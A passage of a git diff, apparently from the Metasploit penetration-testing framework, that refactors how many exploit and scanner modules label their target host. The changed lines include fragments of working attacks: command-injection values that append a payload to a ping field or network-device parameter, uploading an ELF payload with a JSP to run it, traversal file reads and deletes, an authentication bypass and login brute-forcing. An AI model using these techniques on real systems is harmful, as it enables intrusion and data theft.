 .../multi/http/kordil_edms_upload_exec.rb     | 13 +++--
 .../multi/http/mobilecartly_upload_exec.rb    |  8 ++-
 .../multi/http/movabletype_upgrade_exec.rb    |  6 +--
 .../multi/http/php_volunteer_upload_exec.rb   | 24 ++++-----
 .../exploits/multi/http/qdpm_upload_exec.rb   | 26 +++++-----
 .../exploits/multi/http/sflog_upload_exec.rb  | 14 +++---
 .../multi/http/sonicwall_gms_upload.rb        | 14 +++---
 .../multi/http/testlink_upload_exec.rb        | 50 +++++++++----------
 .../exploits/multi/http/wikka_spam_exec.rb    | 16 +++---
 .../unix/webapp/datalife_preview_exec.rb      |  4 +-
 .../exploits/unix/webapp/hastymail_exec.rb    | 14 +++---
 .../invision_pboard_unserialize_exec.rb       | 20 ++++----
 .../exploits/unix/webapp/php_charts_exec.rb   | 10 ++--
 .../unix/webapp/projectpier_upload_exec.rb    | 10 ++--
 .../unix/webapp/sugarcrm_unserialize_exec.rb  | 21 ++++----
 .../unix/webapp/tikiwiki_unserialize_exec.rb  | 19 ++++---
 .../webapp/zoneminder_packagecontrol_exec.rb  | 18 +++----
 .../http/avaya_ccr_imageupload_exec.rb        | 23 ++++-----
 .../windows/http/hp_imc_mibfileupload.rb      | 10 ++--
 .../http/hp_sitescope_runomagentcommand.rb    |  6 +--
 .../windows/http/sap_host_control_cmd_exec.rb | 18 +++----
 .../windows/http/umbraco_upload_aspx.rb       | 35 ++++++-------
 .../http/vmware_vcenter_chargeback_upload.rb  | 18 +++----
 .../misc/ibm_director_cim_dllinject.rb        |  8 ++-
 44 files changed, 342 insertions(+), 427 deletions(-)

diff --git a/modules/auxiliary/admin/http/axigen_file_access.rb b/modules/auxiliary/admin/http/axigen_file_access.rb
index 79cda395e9..2b3e656c44 100644
--- a/modules/auxiliary/admin/http/axigen_file_access.rb
+++ b/modules/auxiliary/admin/http/axigen_file_access.rb
@@ -51,13 +51,11 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def run
-    @peer = "#{rhost}:#{rport}"
-
-    print_status("#{@peer} - Trying to login")
+    print_status("#{peer} - Trying to login")
     if login
-      print_good("#{@peer} - Login successful")
+      print_good("#{peer} - Login successful")
     else
-      print_error("#{@peer} - Login failed, review USERNAME and PASSWORD options")
+      print_error("#{peer} - Login failed, review USERNAME and PASSWORD options")
       return
     end
 
@@ -69,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
       @traversal.gsub!(/\//, "\\")
       file.gsub!(/\//, "\\")
     else # unix
-      print_error("#{@peer} - *nix platform detected, vulnerability is only known to work on Windows")
+      print_error("#{peer} - *nix platform detected, vulnerability is only known to work on Windows")
       return
     end
 
@@ -83,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary
 
   def read_file(file)
 
-    print_status("#{@peer} - Retrieving file contents...")
+    print_status("#{peer} - Retrieving file contents...")
 
     res = send_request_cgi(
     {
@@ -98,14 +96,14 @@ class Metasploit3 < Msf::Auxiliary
 
     if res and res.code == 200 and res.headers['Content-Type'] and res.body.length > 0
       store_path = store_loot("axigen.webadmin.data", "application/octet-stream", rhost, res.body, file)
-      print_good("#{@peer} - File successfully retrieved and saved on #{store_path}")
+      print_good("#{peer} - File successfully retrieved and saved on #{store_path}")
     else
-      print_error("#{@peer} - Failed to retrieve file")
+      print_error("#{peer} - Failed to retrieve file")
     end
   end
 
   def delete_file(file)
-    print_status("#{@peer} - Deleting file #{file}")
+    print_status("#{peer} - Deleting file #{file}")
 
     res = send_request_cgi(
     {
@@ -121,14 +119,14 @@ class Metasploit3 < Msf::Auxiliary
     })
 
     if res and res.code == 200 and res.body =~ /View Log Files/
-      print_good("#{@peer} - File #{file} deleted")
+      print_good("#{peer} - File #{file} deleted")
     else
-      print_error("#{@peer} - Error deleting file #{file}")
+      print_error("#{peer} - Error deleting file #{file}")
     end
   end
 
   def get_platform
-    print_status("#{@peer} - Retrieving platform")
+    print_status("#{peer} - Retrieving platform")
 
     res = send_request_cgi(
       {
@@ -142,15 +140,15 @@ class Metasploit3 < Msf::Auxiliary
 
     if res and res.code == 200
       if res.body =~ /Windows/
-        print_good("#{@peer} - Windows platform found")
+        print_good("#{peer} - Windows platform found")
         return 'windows'
       elsif res.body =~ /Linux/
-        print_good("#{@peer} - Linux platform found")
+        print_good("#{peer} - Linux platform found")
         return 'unix'
       end
     end
 
-    print_warning("#{@peer} - Platform not found, assuming UNIX flavor")
+    print_warning("#{peer} - Platform not found, assuming UNIX flavor")
     return 'unix'
   end
 
diff --git a/modules/auxiliary/admin/http/iis_auth_bypass.rb b/modules/auxiliary/admin/http/iis_auth_bypass.rb
index 907b6d346d..765c4428ae 100644
--- a/modules/auxiliary/admin/http/iis_auth_bypass.rb
+++ b/modules/auxiliary/admin/http/iis_auth_bypass.rb
@@ -76,19 +76,17 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def run
-    @peer = "#{rhost}:#{rport}"
-
     if not has_auth
-      print_error("#{@peer} - No basic authentication enabled")
+      print_error("#{peer} - No basic authentication enabled")
       return
     end
 
     bypass_string = try_auth
 
     if bypass_string.empty?
-      print_error("#{@peer} - The bypass attempt did not work")
+      print_error("#{peer} - The bypass attempt did not work")
     else
-      print_good("#{@peer} - You can bypass auth by doing: #{bypass_string}")
+      print_good("#{peer} - You can bypass auth by doing: #{bypass_string}")
     end
   end
 
diff --git a/modules/auxiliary/admin/http/intersil_pass_reset.rb b/modules/auxiliary/admin/http/intersil_pass_reset.rb
index fcd4f912a9..7d663c7a44 100644
--- a/modules/auxiliary/admin/http/intersil_pass_reset.rb
+++ b/modules/auxiliary/admin/http/intersil_pass_reset.rb
@@ -52,23 +52,22 @@ class Metasploit3 < Msf::Auxiliary
       })
 
       if (res and (m = res.headers['Server'].match(/Boa\/(.*)/)))
-        print_status("#{@peer} - Boa Version Detected: #{m[1]}")
+        print_status("#{peer} - Boa Version Detected: #{m[1]}")
         return Exploit::CheckCode::Safe if (m[1][0].ord-48>0) # boa server wrong version
         return Exploit::CheckCode::Safe if (m[1][3].ord-48>4)
         return Exploit::CheckCode::Vulnerable
       else
-        print_status("#{@peer} - Not a Boa Server!")
+        print_status("#{peer} - Not a Boa Server!")
         return Exploit::CheckCode::Safe # not a boa server
       end
 
     rescue Rex::ConnectionRefused
-      print_error("#{@peer} - Connection refused by server.")
+      print_error("#{peer} - Connection refused by server.")
       return Exploit::CheckCode::Safe
     end
   end
 
   def run
-    @peer = "#{rhost}:#{rport}"
     return if check != Exploit::CheckCode::Vulnerable
 
     uri = normalize_uri(target_uri.path)
@@ -81,14 +80,14 @@ class Metasploit3 < Msf::Auxiliary
     })
 
     if res.nil?
-      print_error("#{@peer} - The server may be down")
+      print_error("#{peer} - The server may be down")
       return
     elsif res and res.code != 401
-      print_status("#{@peer} - #{uri} does not have basic authentication enabled")
+      print_status("#{peer} - #{uri} does not have basic authentication enabled")
       return
     end
 
-    print_status("#{@peer} - Server still operational. Checking to see if password has been overwritten")
+    print_status("#{peer} - Server still operational. Checking to see if password has been overwritten")
     res = send_request_cgi({
       'uri'   => uri,
       'method'=> 'GET',
@@ -96,17 +95,17 @@ class Metasploit3 < Msf::Auxiliary
     })
 
     if not res
-      print_error("#{@peer} - Server timedout, will not continue")
+      print_error("#{peer} - Server timedout, will not continue")
       return
     end
 
     case res.code
     when 200
-      print_good("#{@peer} - Password reset successful with admin:#{datastore['PASSWORD']}")
+      print_good("#{peer} - Password reset successful with admin:#{datastore['PASSWORD']}")
     when 401
-      print_error("#{@peer} - Access forbidden. The password reset attempt did not work")
+      print_error("#{peer} - Access forbidden. The password reset attempt did not work")
     else
-      print_status("#{@peer} - Unexpected response: Code #{res.code} encountered")
+      print_status("#{peer} - Unexpected response: Code #{res.code} encountered")
     end
 
   end
diff --git a/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb b/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb
index f9e7ee1ae0..32c3ce4654 100644
--- a/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb
+++ b/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb
@@ -51,13 +51,11 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def run
-    @peer = "#{rhost}:#{rport}"
-
-    print_status("#{@peer} - Trying to login")
+    print_status("#{peer} - Trying to login")
     if login
-      print_good("#{@peer} - Login successful")
+      print_good("#{peer} - Login successful")
     else
-      print_error("#{@peer} - Login failed, review USERNAME and PASSWORD options")
+      print_error("#{peer} - Login failed, review USERNAME and PASSWORD options")
       return
     end
 
@@ -71,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary
 
   def read_file(file)
 
-    print_status("#{@peer} - Copying file to Web location...")
+    print_status("#{peer} - Copying file to Web location...")
 
     dst_path = "/usr/jakarta/tomcat/webapps/ROOT/m/"
     res = send_request_cgi(
@@ -88,12 +86,12 @@ class Metasploit3 < Msf::Auxiliary
     })
 
     if res and res.code == 200 and res.body =~ /\{"success":true\}/
-      print_good("#{@peer} - File #{file} copied to #{dst_path} successfully")
+      print_good("#{peer} - File #{file} copied to #{dst_path} successfully")
     else
-      print_error("#{@peer} - Failed to copy #{file} to #{dst_path}")
+      print_error("#{peer} - Failed to copy #{file} to #{dst_path}")
     end
 
-    print_status("#{@peer} - Retrieving file contents...")
+    print_status("#{peer} - Retrieving file contents...")
 
     res = send_request_cgi(
       {
@@ -103,9 +101,9 @@ class Metasploit3 < Msf::Auxiliary
 
     if res and res.code == 200
       store_path = store_loot("mutiny.frontend.data", "application/octet-stream", rhost, res.body, file)
-      print_good("#{@peer} - File successfully retrieved and saved on #{store_path}")
+      print_good("#{peer} - File successfully retrieved and saved on #{store_path}")
     else
-      print_error("#{@peer} - Failed to retrieve file")
+      print_error("#{peer} - Failed to retrieve file")
     end
 
     # Cleanup
@@ -113,7 +111,7 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def delete_file(file)
-    print_status("#{@peer} - Deleting file #{file}")
+    print_status("#{peer} - Deleting file #{file}")
 
     res = send_request_cgi(
     {
@@ -127,9 +125,9 @@ class Metasploit3 < Msf::Auxiliary
     })
 
     if res and res.code == 200 and res.body =~ /\{"success":true\}/
-      print_good("#{@peer} - File #{file} deleted")
+      print_good("#{peer} - File #{file} deleted")
     else
-      print_error("#{@peer} - Error deleting file #{file}")
+      print_error("#{peer} - Error deleting file #{file}")
     end
   end
 
diff --git a/modules/auxiliary/admin/http/sophos_wpa_traversal.rb b/modules/auxiliary/admin/http/sophos_wpa_traversal.rb
index a389ab33f3..0f64880d6e 100644
--- a/modules/auxiliary/admin/http/sophos_wpa_traversal.rb
+++ b/modules/auxiliary/admin/http/sophos_wpa_traversal.rb
@@ -72,7 +72,7 @@ class Metasploit3 < Msf::Auxiliary
     travs << file
     travs << "%00"
 
-    print_status("#{@peer} - Retrieving file contents...")
+    print_status("#{peer} - Retrieving file contents...")
 
     res = send_request_cgi(
       {
@@ -95,19 +95,17 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   def run
-    @peer = "#{rhost}:#{rport}"
-
-    print_status("#{@peer} - Checking if it's a Sophos Web Protect Appliance with the vulnerable component...")
+    print_status("#{peer} - Checking if it's a Sophos Web Protect Appliance with the vulnerable component...")
     if is_proficy?
-      print_good("#{@peer} - Check successful")
+      print_good("#{peer} - Check successful")
     else
-      print_error("#{@peer} - Sophos Web Protect Appliance vulnerable component not found")
+      print_error("#{peer} - Sophos Web Protect Appliance vulnerable component not found")
       return
     end
 
     contents = read_file(datastore['FILEPATH'])
     if contents.nil?
-      print_error("#{@peer} - File not downloaded")
+      print_error("#{peer} - File not downloaded")
       return
     end
 
@@ -119,7 +117,7 @@ class Metasploit3 < Msf::Auxiliary
         contents,
         file_name
     )
-    print_good("#{rhost}:#{rport} - File saved in: #{path}")
+    print_good("#{peer} - File saved in: #{path}")
 
   end
 
diff --git a/modules/auxiliary/scanner/http/dolibarr_login.rb b/modules/auxiliary/scanner/http/dolibarr_login.rb
index b5b8124b98..11bebc738e 100644
--- a/modules/auxiliary/scanner/http/dolibarr_login.rb
+++ b/modules/auxiliary/scanner/http/dolibarr_login.rb
@@ -62,11 +62,11 @@ class Metasploit3 < Msf::Auxiliary
     #
     sid, token = get_sid_token
     if sid.nil? or token.nil?
-      print_error("#{@peer} - Unable to obtain session ID or token, cannot continue")
+      print_error("#{peer} - Unable to obtain session ID or token, cannot continue")
       return :abort
     else
-      vprint_status("#{@peer} - Using sessiond ID: #{sid}")
-      vprint_status("#{@peer} - Using token: #{token}")
+      vprint_status("#{peer} - Using sessiond ID: #{sid}")
+      vprint_status("#{peer} - Using token: #{token}")
     end
 
     begin
@@ -86,18 +86,18 @@ class Metasploit3 < Msf::Auxiliary
         }
       })
     rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
-      vprint_error("#{@peer} - Service failed to respond")
+      vprint_error("#{peer} - Service failed to respond")
       return :abort
     end
 
     if res.nil?
-      print_error("#{@peer} - Connection timed out")
+      print_error("#{peer} - Connection timed out")
       return :abort
     end
 
     location = res.headers['Location']
     if res and res.headers and (location = res.headers['Location']) and location =~ /admin\//
-      print_good("#{@peer} - Successful login: \"#{user}:#{pass}\"")
+      print_good("#{peer} - Successful login: \"#{user}:#{pass}\"")
       report_auth_info({
         :host        => rhost,
         :port        => rport,
@@ -109,7 +109,7 @@ class Metasploit3 < Msf::Auxiliary
       })
       return :next_user
     else
-      vprint_error("#{@peer} - Bad login: \"#{user}:#{pass}\"")
+      vprint_error("#{peer} - Bad login: \"#{user}:#{pass}\"")
       return
     end
   end
@@ -117,10 +117,9 @@ class Metasploit3 < Msf::Auxiliary
   def run
     @uri = target_uri.path
     @uri.path << "/" if @uri.path[-1, 1] != "/"
-    @peer = "#{rhost}:#{rport}"
 
     each_user_pass { |user, pass|
-      vprint_status("#{@peer} - Trying \"#{user}:#{pass}\"")
+      vprint_status("#{peer} - Trying \"#{user}:#{pass}\"")
       do_login(user, pass)
     }
   end
diff --git a/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb b/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb
index f106012c11..d859c12eb7 100644
--- a/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb
+++ b/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb
@@ -47,18 +47,17 @@ class Metasploit4 < Msf::Auxiliary
   end
 
   def run_host(ip)
-    @peer = "#{rhost}:#{rport}"
     @uri = normalize_uri(target_uri.path)
     @uri << '/' if @uri[-1,1] != '/'
 
-    print_status("#{@peer} - Connecting to SiteScope SOAP Interface")
+    print_status("#{peer} - Connecting to SiteScope SOAP Interface")
 
     res = send_request_cgi({
       'uri'     => "#{@uri}services/APISiteScopeImpl",
       'method'  => 'GET'})
 
     if not res
-      print_error("#{@peer} - Unable to connect")
+      print_error("#{peer} - Unable to connect")
       return
     end
 
@@ -66,7 +65,7 @@ class Metasploit4 < Msf::Auxiliary
   end
 
   def accessfile
-    print_status("#{@peer} - Retrieving the target hostname")
+    print_status("#{peer} - Retrieving the target hostname")
 
     data = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n"
     data << "<wsns0:Envelope" + "\r\n"
@@ -108,11 +107,11 @@ class Metasploit4 < Msf::Auxiliary
     end
 
     if not host_name or host_name.empty?
-      print_error("#{@peer} - Failed to retrieve the host name")
+      print_error("#{peer} - Failed to retrieve the host name")
       return
     end
 
-    print_status("#{@peer} - Retrieving the file contents")
+    print_status("#{peer} - Retrieving the file contents")
 
     data = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n"
     data << "<wsns0:Envelope" + "\r\n"
@@ -153,7 +152,7 @@ class Metasploit4 < Msf::Auxiliary
         boundary = $1
       end
       if not boundary or boundary.empty?
-        print_error("#{@peer} - Failed to retrieve the file contents")
+        print_error("#{peer} - Failed to retrieve the file contents")
         return
       end
 
@@ -161,7 +160,7 @@ class Metasploit4 < Msf::Auxiliary
         cid = $1
       end
       if not cid or cid.empty?
-        print_error("#{@peer} - Failed to retrieve the file contents")
+        print_error("#{peer} - Failed to retrieve the file contents")
         return
       end
 
@@ -169,17 +168,17 @@ class Metasploit4 < Msf::Auxiliary
         loot = Rex::Text.ungzip($1)
       end
       if not loot or loot.empty?
-        print_error("#{@peer} - Failed to retrieve the file contents")
+        print_error("#{peer} - Failed to retrieve the file contents")
         return
       end
 
       f = ::File.basename(datastore['RFILE'])
       path = store_loot('hp.sitescope.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE'])
-      print_status("#{@peer} - #{datastore['RFILE']} saved in #{path}")
+      print_status("#{peer} - #{datastore['RFILE']} saved in #{path}")
       return
     end
 
-    print_error("#{@peer} - Failed to retrieve the file contents")
+    print_error("#{peer} - Failed to retrieve the file contents")
   end
 
 end
diff --git a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb
index fbff7d1784..94ce69255d 100644
--- a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb
+++ b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb
@@ -48,11 +48,10 @@ class Metasploit4 < Msf::Auxiliary
   end
 
   def run_host(ip)
-    @peer = "#{rhost}:#{rport}"
     @uri = normalize_uri(target_uri.path)
     @uri << '/' if @uri[-1,1] != '/'
 
-    print_status("#{@peer} - Connecting to SiteScope SOAP Interface")
+    print_status("#{peer} - Connecting to SiteScope SOAP Interface")
 
     uri = normalize_uri(@uri, 'services/APISiteScopeImpl')
 
@@ -61,7 +60,7 @@ class Metasploit4 < Msf::Auxiliary
       'method'  => 'GET'})
 
     if not res
-      print_error("#{@peer} - Unable to connect")
+      print_error("#{peer} - Unable to connect")
       return
     end
 
@@ -85,7 +84,7 @@ class Metasploit4 < Msf::Auxiliary
     data << "</wsns0:Body>" + "\r\n"
     data << "</wsns0:Envelope>"
 
-    print_status("#{@peer} - Retrieving the SiteScope Configuration")
+    print_status("#{peer} - Retrieving the SiteScope Configuration")
 
     uri = normalize_uri(@uri, 'services/APISiteScopeImpl')
 
@@ -104,7 +103,7 @@ class Metasploit4 < Msf::Auxiliary
         boundary = $1
       end
       if not boundary or boundary.empty?
-        print_error("#{@peer} - Failed to retrieve the SiteScope Configuration")
+        print_error("#{peer} - Failed to retrieve the SiteScope Configuration")
         return
       end
 
@@ -112,7 +111,7 @@ class Metasploit4 < Msf::Auxiliary
         cid = $1
       end
       if not cid or cid.empty?
-        print_error("#{@peer} - Failed to retrieve the SiteScope Configuration")
+        print_error("#{peer} - Failed to retrieve the SiteScope Configuration")
         return
       end
 
@@ -120,17 +119,17 @@ class Metasploit4 < Msf::Auxiliary
         loot = Rex::Text.ungzip($1)
       end
       if not loot or loot.empty?
-        print_error("#{@peer} - Failed to retrieve the SiteScope Configuration")
+        print_error("#{peer} - Failed to retrieve the SiteScope Configuration")
         return
       end
 
       path = store_loot('hp.sitescope.configuration', 'application/octet-stream', rhost, loot, cid, "#{rhost} HP SiteScope Configuration")
-      print_status("#{@peer} - HP SiteScope Configuration saved in #{path}")
-      print_status("#{@peer} - HP SiteScope Configuration is saved as Java serialization data")
+      print_status("#{peer} - HP SiteScope Configuration saved in #{path}")
+      print_status("#{peer} - HP SiteScope Configuration is saved as Java serialization data")
       return
     end
 
-    print_error("#{@peer} - Failed to retrieve the SiteScope Configuration")
+    print_error("#{peer} - Failed to retrieve the SiteScope Configuration")
   end
 
 end
diff --git a/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb b/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb
index 41ae7de512..710a3abecb 100644
--- a/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb
+++ b/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb
@@ -47,11 +47,10 @@ class Metasploit4 < Msf::Auxiliary
   end
 
   def run_host(ip)
-    @peer = "#{rhost}:#{rport}"
     @uri = normalize_uri(target_uri.path)
     @uri << '/' if @uri[-1,1] != '/'
 
-    print_status("#{@peer} - Connecting to SiteScope SOAP Interface")
+    print_status("#{peer} - Connecting to SiteScope SOAP Interface")
 
     uri = normalize_uri(@uri, 'services/APIMonitorImpl')
 
@@ -60,7 +59,7 @@ class Metasploit4 < Msf::Auxiliary
       'method'  => 'GET'})
 
     if not res
-      print_error("#{@peer} - Unable to connect")
+      print_error("#{peer} - Unable to connect")
       return
     end
 
@@ -89,7 +88,7 @@ class Metasploit4 < Msf::Auxiliary
     data << "</wsns0:Body>" + "\r\n"
     data << "</wsns0:Envelope>" + "\r\n"
 
-    print_status("#{@peer} - Retrieving the file contents")
+    print_status("#{peer} - Retrieving the file contents")
 
     uri = normalize_uri(@uri, 'services/APIMonitorImpl')
 
@@ -105,16 +104,16 @@ class Metasploit4 < Msf::Auxiliary
     if res and res.code == 200 and res.body =~ /<loadFileContentReturn xsi:type="xsd:string">(.*)<\/loadFileContentReturn>/m
       loot = CGI.unescapeHTML($1)
       if not loot or loot.empty?
-        print_status("#{@peer} - Retrieved empty file")
+        print_status("#{peer} - Retrieved empty file")
         return
       end
       f = ::File.basename(datastore['RFILE'])
       path = store_loot('hp.sitescope.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE'])
-      print_status("#{@peer} - #{datastore['RFILE']} saved in #{path}")
+      print_status("#{peer} - #{datastore['RFILE']} saved in #{path}")
       return
     end
 
-    print_error("#{@peer} - Failed to retrieve the file")
+    print_error("#{peer} - Failed to retrieve the file")
   end
 
 end
diff --git a/modules/auxiliary/scanner/http/vcms_login.rb b/modules/auxiliary/scanner/http/vcms_login.rb
index c7c5a4e6d4..21610d3ab7 100644
--- a/modules/auxiliary/scanner/http/vcms_login.rb
+++ b/modules/auxiliary/scanner/http/vcms_login.rb
@@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary
         'cookie' => sid
       })
     rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
-      vprint_error("#{@peer} - Service failed to respond")
+      vprint_error("#{peer} - Service failed to respond")
       return :abort
     end
 
@@ -86,9 +86,9 @@ class Metasploit3 < Msf::Auxiliary
       when /User name already confirmed/
         return :skip_user
       when /Invalid password/
-        vprint_status("#{@peer} - Username found: #{user}")
+        vprint_status("#{peer} - Username found: #{user}")
       else /\<a href="process\.php\?logout=1"\>/
-        print_good("#{@peer} - Successful login: \"#{user}:#{pass}\"")
+        print_good("#{peer} - Successful login: \"#{user}:#{pass}\"")
         report_auth_info({
           :host        => rhost,
           :port        => rport,
@@ -108,10 +108,9 @@ class Metasploit3 < Msf::Auxiliary
   def run
     @uri = normalize_uri(target_uri.path)
     @uri.path << "/" if @uri.path[-1, 1] != "/"
-    @peer = "#{rhost}:#{rport}"
 
     each_user_pass { |user, pass|
-      vprint_status("#{@peer} - Trying \"#{user}:#{pass}\"")
+      vprint_status("#{peer} - Trying \"#{user}:#{pass}\"")
       do_login(user, pass)
     }
   end
diff --git a/modules/exploits/linux/http/mutiny_frontend_upload.rb b/modules/exploits/linux/http/mutiny_frontend_upload.rb
index a1b20531f8..3ea050d12a 100644
--- a/modules/exploits/linux/http/mutiny_frontend_upload.rb
+++ b/modules/exploits/linux/http/mutiny_frontend_upload.rb
@@ -140,40 +140,38 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-    @peer = "#{rhost}:#{rport}"
-
-    print_status("#{@peer} - Trying to login")
+    print_status("#{peer} - Trying to login")
     if login
-      print_good("#{@peer} - Login successful")
+      print_good("#{peer} - Login successful")
     else
-      fail_with(Failure::NoAccess, "#{@peer} - Login failed, review USERNAME and PASSWORD options")
+      fail_with(Failure::NoAccess, "#{peer} - Login failed, review USERNAME and PASSWORD options")
     end
 
     exploit_native
   end
 
   def exploit_native
-    print_status("#{@peer} - Uploading executable Payload file")
+    print_status("#{peer} - Uploading executable Payload file")
     elf = payload.encoded_exe
     elf_location = "/tmp"
     elf_filename = "#{rand_text_alpha_lower(8)}.elf"
     if upload_file(elf_location, elf_filename, elf)
       register_files_for_cleanup("#{elf_location}/#{elf_filename}")
     else
-      fail_with(Failure::Unknown, "#{@peer} - Payload upload failed")
+      fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
     end
 
-    print_status("#{@peer} - Uploading JSP to execute the payload")
+    print_status("#{peer} - Uploading JSP to execute the payload")
     jsp = jsp_execute_command("#{elf_location}/#{elf_filename}")
     jsp_location = "/usr/jakarta/tomcat/webapps/ROOT/m"
     jsp_filename = "#{rand_text_alpha_lower(8)}.jsp"
     if upload_file(jsp_location, jsp_filename, jsp)
       register_files_for_cleanup("#{jsp_location}/#{jsp_filename}")
     else
-      fail_with(Failure::Unknown, "#{@peer} - JSP upload failed")
+      fail_with(Failure::Unknown, "#{peer} - JSP upload failed")
     end
 
-    print_status("#{@peer} - Executing payload")
+    print_status("#{peer} - Executing payload")
     send_request_cgi(
     {
       'uri'    => normalize_uri(target_uri.path, "m", jsp_filename),
diff --git a/modules/exploits/linux/http/openfiler_networkcard_exec.rb b/modules/exploits/linux/http/openfiler_networkcard_exec.rb
index 5fe8599efa..6b811fb3bd 100644
--- a/modules/exploits/linux/http/openfiler_networkcard_exec.rb
+++ b/modules/exploits/linux/http/openfiler_networkcard_exec.rb
@@ -69,11 +69,8 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-
-    @peer = "#{rhost}:#{rport}"
-
     # retrieve software version from login page
-    print_status("#{@peer} - Sending check")
+    print_status("#{peer} - Sending check")
     begin
       res = send_request_cgi({
         'uri' => '/'
@@ -86,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
       end
 
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      print_error("#{@peer} - Connection failed")
+      print_error("#{peer} - Connection failed")
     end
     return Exploit::CheckCode::Unknown
 
@@ -98,14 +95,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
   def exploit
-
-    @peer = "#{rhost}:#{rport}"
     user  = datastore['USERNAME']
     pass  = datastore['PASSWORD']
     cmd   = Rex::Text.uri_encode("&#{payload.raw}&")
 
     # send payload
-    print_status("#{@peer} - Sending payload (#{payload.raw.length} bytes)")
+    print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)")
     begin
       res = send_request_cgi({
         'uri'    => "/admin/system.html?step=2&device=lo#{cmd}",
@@ -116,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     if    res and res.code == 200 and res.body =~ /<title>System : Network Setup<\/title>/
-      print_good("#{@peer} - Payload sent successfully")
+      print_good("#{peer} - Payload sent successfully")
     elsif res and res.code == 302 and res.headers['Location'] =~ /\/index\.html\?redirect/
       fail_with(Failure::NoAccess, 'Authentication failed')
     else
diff --git a/modules/exploits/linux/http/wanem_exec.rb b/modules/exploits/linux/http/wanem_exec.rb
index 5a81eed3a1..1a64359162 100644
--- a/modules/exploits/linux/http/wanem_exec.rb
+++ b/modules/exploits/linux/http/wanem_exec.rb
@@ -65,12 +65,11 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-    @peer = "#{rhost}:#{rport}"
     fingerprint = Rex::Text.rand_text_alphanumeric(rand(8)+4)
     data  = "pc=127.0.0.1; "
     data << Rex::Text.uri_encode("echo #{fingerprint}")
     data << "%26"
-    print_status("#{@peer} - Sending check")
+    print_status("#{peer} - Sending check")
 
     begin
       res = send_request_cgi({
@@ -79,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
         'data'   => data
       }, 25)
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      print_error("#{@peer} - Connection failed")
+      print_error("#{peer} - Connection failed")
       return Exploit::CheckCode::Unknown
     end
 
@@ -91,11 +90,10 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-    @peer = "#{rhost}:#{rport}"
     data  = "pc=127.0.0.1; "
     data << Rex::Text.uri_encode(payload.raw)
     data << "%26"
-    print_status("#{@peer} - Sending payload (#{payload.raw.length} bytes)")
+    print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)")
     begin
       res = send_request_cgi({
         'uri'    => '/WANem/result.php',
@@ -103,12 +101,12 @@ class Metasploit3 < Msf::Exploit::Remote
         'data'   => data
       }, 25)
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      print_error("#{@peer} - Connection failed")
+      print_error("#{peer} - Connection failed")
     end
     if res and res.code == 200
-      print_good("#{@peer} - Payload sent successfully")
+      print_good("#{peer} - Payload sent successfully")
     else
-      print_error("#{@peer} - Sending payload failed")
+      print_error("#{peer} - Sending payload failed")
     end
   end
 
diff --git a/modules/exploits/linux/http/zen_load_balancer_exec.rb b/modules/exploits/linux/http/zen_load_balancer_exec.rb
index 9b38619619..fe82b999be 100644
--- a/modules/exploits/linux/http/zen_load_balancer_exec.rb
+++ b/modules/exploits/linux/http/zen_load_balancer_exec.rb
@@ -65,11 +65,8 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-
-    @peer = "#{rhost}:#{rport}"
-
     # retrieve software version from config file
-    print_status("#{@peer} - Sending check")
+    print_status("#{peer} - Sending check")
     begin
       res = send_request_cgi({
         'uri' => '/config/global.conf'
@@ -82,15 +79,13 @@ class Metasploit3 < Msf::Exploit::Remote
       end
 
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      print_error("#{@peer} - Connection failed")
+      print_error("#{peer} - Connection failed")
     end
     return Exploit::CheckCode::Unknown
 
   end
 
   def exploit
-
